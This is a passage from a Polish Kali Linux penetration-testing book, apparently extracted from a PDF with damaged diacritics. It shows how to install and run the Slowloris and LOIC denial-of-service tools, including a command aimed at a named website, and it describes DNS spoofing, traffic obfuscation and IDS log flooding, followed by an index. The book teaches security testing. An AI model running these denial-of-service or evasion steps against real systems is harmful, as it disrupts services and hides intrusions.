programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco
czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera
Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne
Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris
Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej
perl slowlorispl
W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)
perl slowlorispl -dns thesecuritybloggercom
Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)
Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)
Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
263
LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
264
narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki
Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa
Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej
apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs
Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej
mkdir loic
Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej
wget httpsrawgithubcomnicolargoloicinstaller masterloicsh
Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie
chmod 777 loicsh
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
265
Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej
loicsh install
Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie
loicsh update
Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie
loicsh run
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
266
U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny
Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP
Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding
Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane
DNSChef
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
267
Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne
Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera
SniffJoke
SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
268
SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force
Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)
Sk adnia wywo ania polecenia siege jest nast puj ca
siege [opcje] ltadres URL celugt
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
269
Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-
nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku
InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
270
wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS
TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych
Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci
PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
